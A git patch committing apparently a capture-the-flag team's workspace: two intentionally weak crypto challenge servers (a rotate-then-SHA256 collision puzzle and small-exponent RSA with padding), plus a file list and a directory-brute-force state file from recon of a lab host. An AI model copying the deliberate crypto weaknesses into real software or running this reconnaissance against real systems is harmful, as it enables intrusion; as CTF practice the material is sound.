From eaec057bb19af32c223bfc1f71a312d737c11037 Mon Sep 17 00:00:00 2001 From: Simon Date: Fri, 24 Nov 2023 17:54:35 +0100 Subject: [PATCH] laokoon --- LaokoonHaxorcist/crypto_me_is_me/server.py | 42 + LaokoonHaxorcist/crypto_psa_games/server.py | 58 ++ ...x-http_10_129_243_131:80_-1698492933.state | 1 + LaokoonHaxorcist/fullpwn/hashes.asreproast | 0 .../results/10.129.243.131/report/local.txt | 0 .../results/10.129.243.131/report/notes.txt | 244 +++++ .../results/10.129.243.131/report/proof.txt | 0 .../report.md/10.129.243.131/Commands.md | 177 ++++ .../report/report.md/10.129.243.131/Errors.md | 56 ++ .../10.129.243.131/Manual Commands.md | 221 +++++ .../report.md/10.129.243.131/Patterns.md | 4 + .../Port Scans/PortScan - All TCP Ports.md | 82 ++ .../PortScan - Top 100 UDP Ports.md | 51 + .../Port Scans/PortScan - Top TCP Ports.md | 81 ++ .../Service - tcp-135-msrpc/Nmap MSRPC.md | 20 + .../Service - tcp-135-msrpc/get-arch.md | 15 + .../Service - tcp-135-msrpc/rpcdump.md | 15 + .../Enum4Linux.md | 148 +++ .../Service - tcp-139-netbios-ssn/Nmap SMB.md | 20 + .../SMBClient.md | 11 + .../Service - tcp-139-netbios-ssn/SMBMap.md | 66 ++ .../Service - tcp-139-netbios-ssn/nbtscan.md | 12 + .../Service - tcp-3268-ldap/Nmap LDAP.md | 20 + .../Service - tcp-389-ldap/Nmap LDAP.md | 20 + .../Nmap SMB.md | 20 + .../Service - tcp-445-microsoft-ds/SMBMap.md | 66 ++ .../Nmap Kerberos.md | 20 + .../DNS Reverse Lookup.md | 18 + .../DNS Zone Transfer.md | 19 + .../Service - tcp-53-domain/Nmap DNS.md | 23 + .../Service - tcp-593-ncacn_http/rpcdump.md | 15 + .../Service - tcp-80-http/Curl Robots.md | 3 + .../Services/Service - tcp-80-http/Curl.md | 60 ++ .../Service - tcp-80-http/Directory Buster.md | 18 + .../Service - tcp-80-http/Known Security.md | 3 + .../Service - tcp-80-http/Nmap HTTP.md | 20 + .../Services/Service - tcp-80-http/whatweb.md | 10 + .../Service - tcp-80-http/wkhtmltoimage.md | 3 + .../Nmap Kerberos.md | 20 + .../Service - udp-123-ntp/Nmap NTP.md | 22 + .../DNS Reverse Lookup.md | 29 + .../DNS Zone Transfer.md | 21 + .../Service - udp-53-domain/Nmap DNS.md | 40 + .../10.129.243.131/scans/_commands.log | 288 ++++++ .../results/10.129.243.131/scans/_errors.log | 56 ++ .../10.129.243.131/scans/_full_tcp_nmap.txt | 77 ++ .../10.129.243.131/scans/_manual_commands.txt | 338 +++++++ .../10.129.243.131/scans/_patterns.log | 8 + .../10.129.243.131/scans/_quick_tcp_nmap.txt | 67 ++ .../scans/_top_100_udp_nmap.txt | 38 + .../scans/tcp135/tcp_135_rpc_architecture.txt | 6 + .../scans/tcp135/tcp_135_rpc_nmap.txt | 12 + .../scans/tcp135/tcp_135_rpc_rpcdump.txt | 880 ++++++++++++++++++ .../scans/tcp135/xml/tcp_135_rpc_nmap.xml | 36 + .../scans/tcp139/enum4linux.txt | 139 +++ .../10.129.243.131/scans/tcp139/nbtscan.txt | 3 + .../10.129.243.131/scans/tcp139/smbclient.txt | 8 + .../scans/tcp139/smbmap-execute-command.txt | 3 + .../scans/tcp139/smbmap-list-contents.txt | 3 + .../scans/tcp139/smbmap-share-permissions.txt | 3 + .../scans/tcp139/tcp_139_smb_nmap.txt | 22 + .../scans/tcp139/xml/tcp_139_smb_nmap.xml | 43 + .../scans/tcp3268/tcp_3268_ldap_nmap.txt | 108 +++ .../scans/tcp3268/xml/tcp_3268_ldap_nmap.xml | 42 + .../scans/tcp389/tcp_389_ldap_nmap.txt | 108 +++ .../scans/tcp389/xml/tcp_389_ldap_nmap.xml | 42 + .../scans/tcp445/smbmap-execute-command.txt | 2 + .../scans/tcp445/smbmap-list-contents.txt | 2 + .../scans/tcp445/smbmap-share-permissions.txt | 2 + .../scans/tcp445/tcp_445_smb_nmap.txt | 50 + .../scans/tcp445/xml/tcp_445_smb_nmap.xml | 78 ++ .../scans/tcp464/tcp_464_kerberos_nmap.txt | 11 + .../tcp464/xml/tcp_464_kerberos_nmap.xml | 36 + .../scans/tcp49667/tcp_49667_rpc_nmap.txt | 12 + .../scans/tcp49667/xml/tcp_49667_rpc_nmap.xml | 36 + .../scans/tcp49673/tcp_49673_rpc_nmap.txt | 12 + .../scans/tcp49673/xml/tcp_49673_rpc_nmap.xml | 37 + .../scans/tcp49695/tcp_49695_rpc_nmap.txt | 12 + .../scans/tcp49695/xml/tcp_49695_rpc_nmap.xml | 36 + .../scans/tcp49843/tcp_49843_rpc_nmap.txt | 12 + .../scans/tcp49843/xml/tcp_49843_rpc_nmap.xml | 36 + .../scans/tcp53/tcp_53_dns_nmap.txt | 26 + .../scans/tcp53/tcp_53_dns_reverse-lookup.txt | 19 + .../tcp53/tcp_53_dns_zone-transfer-domain.txt | 6 + .../scans/tcp53/tcp_53_dns_zone-transfer.txt | 11 + .../scans/tcp53/tcp_53_dnsrecon_default.txt | 3 + ...bdomains_subdomains-top1million-110000.txt | 0 .../scans/tcp53/xml/tcp_53_dns_nmap.xml | 45 + .../scans/tcp593/tcp_593_rpc_rpcdump.txt | 880 ++++++++++++++++++ .../tcp5985/tcp_5985_winrm-detection.txt | 2 + .../scans/tcp80/tcp_80_http_curl.html | 50 + .../tcp_80_http_feroxbuster_dirbuster.txt | 21 + ...b_vhosts_subdomains-top1million-110000.txt | 0 .../scans/tcp80/tcp_80_http_nmap.txt | 106 +++ .../scans/tcp80/tcp_80_http_screenshot.png | Bin 0 -> 2097031 bytes .../scans/tcp80/tcp_80_http_whatweb.txt | 46 + .../scans/tcp80/xml/tcp_80_http_nmap.xml | 81 ++ .../scans/tcp88/tcp_88_kerberos_nmap.txt | 12 + .../scans/tcp88/xml/tcp_88_kerberos_nmap.xml | 43 + .../scans/udp123/udp_123_ntp_nmap.txt | 13 + .../scans/udp123/xml/udp_123_ntp_nmap.xml | 43 + .../scans/udp53/udp_53_dns_nmap.txt | 27 + .../scans/udp53/udp_53_dns_reverse-lookup.txt | 19 + .../udp53/udp_53_dns_zone-transfer-domain.txt | 6 + .../scans/udp53/udp_53_dns_zone-transfer.txt | 11 + .../scans/udp53/udp_53_dnsrecon_default.txt | 3 + ...bdomains_subdomains-top1million-110000.txt | 0 .../scans/udp53/xml/udp_53_dns_nmap.xml | 45 + .../scans/udp88/udp_88_kerberos_nmap.txt | 12 + .../scans/udp88/xml/udp_88_kerberos_nmap.xml | 35 + .../scans/xml/_full_tcp_nmap.xml | 103 ++ .../scans/xml/_quick_tcp_nmap.xml | 92 ++ .../scans/xml/_top_100_udp_nmap.xml | 112 +++ LaokoonHaxorcist/fullpwn/search.req | 13 + LaokoonHaxorcist/fullpwn/users.txt | 3 + .../hw_invasion/hw_invasion/Dockerfile | 21 + .../hw_invasion/hw_invasion/build_docker.sh | 4 + .../hw_invasion/hw_invasion/challenge/app.py | 104 +++ .../hw_invasion/hw_invasion/challenge/bot.py | 29 + .../hw_invasion/challenge/server.py | 31 + .../challenge/static/images/dev.png | Bin 0 -> 84266 bytes .../hw_invasion/challenge/static/js/index.js | 10 + .../challenge/templates/index.html | 139 +++ .../hw_invasion/config/supervisord.conf | 27 + LaokoonHaxorcist/pwn_formula/flag.txt | 1 + LaokoonHaxorcist/pwn_formula/formula | Bin 0 -> 13376 bytes .../results/10.129.243.131/report/local.txt | 0 .../results/10.129.243.131/report/proof.txt | 0 .../10.129.243.131/scans/_commands.log | 4 + .../10.129.243.131/scans/_full_tcp_nmap.txt | 1 + .../10.129.243.131/scans/_quick_tcp_nmap.txt | 1 + .../scans/xml/_full_tcp_nmap.xml | 17 + .../scans/xml/_quick_tcp_nmap.xml | 17 + LaokoonHaxorcist/pwn_formula/solve.py | 9 + .../rev_stringtheory/stringtheory | Bin 0 -> 17112 bytes LaokoonHaxorcist/rev_threekeys/ape.c | 60 ++ LaokoonHaxorcist/rev_threekeys/threekeys | Bin 0 -> 17320 bytes .../rev_threekeys/threekeys.patched | Bin 0 -> 17320 bytes 138 files changed, 6861 insertions(+) create mode 100644 LaokoonHaxorcist/crypto_me_is_me/server.py create mode 100644 LaokoonHaxorcist/crypto_psa_games/server.py create mode 100644 LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state create mode 100644 LaokoonHaxorcist/fullpwn/hashes.asreproast create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-593-ncacn_http/rpcdump.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl Robots.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Curl.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Directory Buster.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Known Security.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/Nmap HTTP.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/whatweb.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-80-http/wkhtmltoimage.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-88-kerberos-sec/Nmap Kerberos.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-123-ntp/Nmap NTP.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Reverse Lookup.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/DNS Zone Transfer.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer-domain.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml create mode 100644 LaokoonHaxorcist/fullpwn/search.req create mode 100644 LaokoonHaxorcist/fullpwn/users.txt create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile create mode 100755 LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py create mode 100755 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py create mode 100755 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/server.py create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/images/dev.png create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/static/js/index.js create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html create mode 100644 LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf create mode 100644 LaokoonHaxorcist/pwn_formula/flag.txt create mode 100755 LaokoonHaxorcist/pwn_formula/formula create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml create mode 100644 LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml create mode 100644 LaokoonHaxorcist/pwn_formula/solve.py create mode 100644 LaokoonHaxorcist/rev_stringtheory/stringtheory create mode 100644 LaokoonHaxorcist/rev_threekeys/ape.c create mode 100755 LaokoonHaxorcist/rev_threekeys/threekeys create mode 100755 LaokoonHaxorcist/rev_threekeys/threekeys.patched diff --git a/LaokoonHaxorcist/crypto_me_is_me/server.py b/LaokoonHaxorcist/crypto_me_is_me/server.py new file mode 100644 index 00000000..d1720f64 --- /dev/null +++ b/LaokoonHaxorcist/crypto_me_is_me/server.py @@ -0,0 +1,42 @@ +from secret import FLAG +from hashlib import sha256 + + +class hash(): + + def __init__(self, message): + self.message = message + + def rotate(self, message): + return [((b >> 4) | (b << 3)) & 0xff for b in message] + + def hexdigest(self): + rotated = self.rotate(self.message) + return sha256(bytes(rotated)).hexdigest() + + +def main(): + original_message = b"ready_play_one!" + original_digest = hash(original_message).hexdigest() + print( + f"Find a message that generate the same hash as this one: {original_digest}" + ) + + while True: + try: + message = input("Enter your message: ") + message = bytes.fromhex(message) + + digest = hash(message).hexdigest() + + if ((original_digest == digest) and (message != original_message)): + print(f"{FLAG}") + else: + print("Conditions not satisfied!") + + except Exception as e: + print(f"An error occurred while processing data: {e}") + + +if __name__ == '__main__': + main() diff --git a/LaokoonHaxorcist/crypto_psa_games/server.py b/LaokoonHaxorcist/crypto_psa_games/server.py new file mode 100644 index 00000000..e5847da9 --- /dev/null +++ b/LaokoonHaxorcist/crypto_psa_games/server.py @@ -0,0 +1,58 @@ +from Crypto.Util.number import bytes_to_long, getPrime, GCD +from Crypto.Util.Padding import pad +# from secret import FLAG + +WELCOME = '''Welcome to my custom PSA cryptosystem! +In this cryptosystem, the message is PKCS#7 padded and then encrypted with RSA. +They say padding makes encryption more secure, right? ;)''' + +MENU = ''' +[1] Encrypt the flag +[2] Exit +''' + + +class PSA: + + def __init__(self): + self.bit_size = 512 + self.e = 11 + + def gen_modulus(self): + while True: + p = getPrime(self.bit_size // 2) + q = getPrime(self.bit_size // 2) + if GCD(self.e, (p - 1) * (q - 1)) == 1: + break + return p * q + + def encrypt(self, msg): + m = bytes_to_long(pad(msg, 16)) + n = self.gen_modulus() + c = pow(m, self.e, n) + return c, n + + +def main(): + psa = PSA() + print(WELCOME) + while True: + try: + print(MENU) + opt = input('> ') + if opt == '1': + enc, modulus = psa.encrypt(b'FLAG') + print(f"\n{hex(enc)}\n{hex(modulus)}") + elif opt == '2': + print('Bye.') + exit(1) + else: + print('\nInvalid option!') + except: + print('\n\nSomething went wrong.') + exit(1) + + +if __name__ == '__main__': + # main() + print(0x65c96a10a5553c2eb1b05ac1369a777089841005b055cbf8dcafc41fd1d11b0a0306b820cbc742796318694b9fdf145214ef3a2385984daa0d6d5ba87bdce687) \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state new file mode 100644 index 00000000..50bc5b6d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state @@ -0,0 +1 @@ +{"scans":[{"id":"c91a32f9c25f4d919c972d924014c2df","url":"http://10.129.243.131:80/","normalized_url":"http://10.129.243.131:80/","scan_type":"Directory","status":"Running","num_requests":833000},{"id":"4738972d3e8744bd9aa88c8925201b37","url":"http://10.129.243.131/text/","normalized_url":"http://10.129.243.131/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"127b151685a44a88aa7cd792c4435b75","url":"http://10.129.243.131/script.js","normalized_url":"http://10.129.243.131/script.js/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0957cded65794d41a274d2df66abcfbb","url":"http://10.129.243.131/text/css","normalized_url":"http://10.129.243.131/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0036760fe13545d79aa04cc6cc7dc498","url":"http://10.129.243.131/style.css","normalized_url":"http://10.129.243.131/style.css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ee08d5151dfc4a7d96671603842a22eb","url":"http://10.129.243.131/.git/text/","normalized_url":"http://10.129.243.131/.git/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b52e11997d8e42278f8b27518a121b23","url":"http://10.129.243.131/.git/text/css","normalized_url":"http://10.129.243.131/.git/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4607674520054cfbbba2277f855ee224","url":"http://10.129.243.131/.git/logs/text/","normalized_url":"http://10.129.243.131/.git/logs/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65d97633b79d48749bc176e399a4b70d","url":"http://10.129.243.131/.git/logs/text/css","normalized_url":"http://10.129.243.131/.git/logs/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"046706eb4fef490fa0a098b88dee49bc","url":"http://10.129.243.131/.svn/text/css","normalized_url":"http://10.129.243.131/.svn/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"27943d584c634bac95093f6a03f41ada","url":"http://10.129.243.131/.svn/text/","normalized_url":"http://10.129.243.131/.svn/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"356dcc3f1e03417aa78932513d2f9d02","url":"http://10.129.243.131/.well-known/text/","normalized_url":"http://10.129.243.131/.well-known/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9a77c322bbe54bd98cf5265ae43eb2ab","url":"http://10.129.243.131/.well-known/autoconfig/text/","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e21ae1192e294b5a849b688b56b69625","url":"http://10.129.243.131/.well-known/text/css","normalized_url":"http://10.129.243.131/.well-known/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e08380f4f1dc4597871aa763ef00eb08","url":"http://10.129.243.131/.well-known/autoconfig/text/css","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"59d5ebeacaea473b87cba620e094d24e","url":"http://10.129.243.1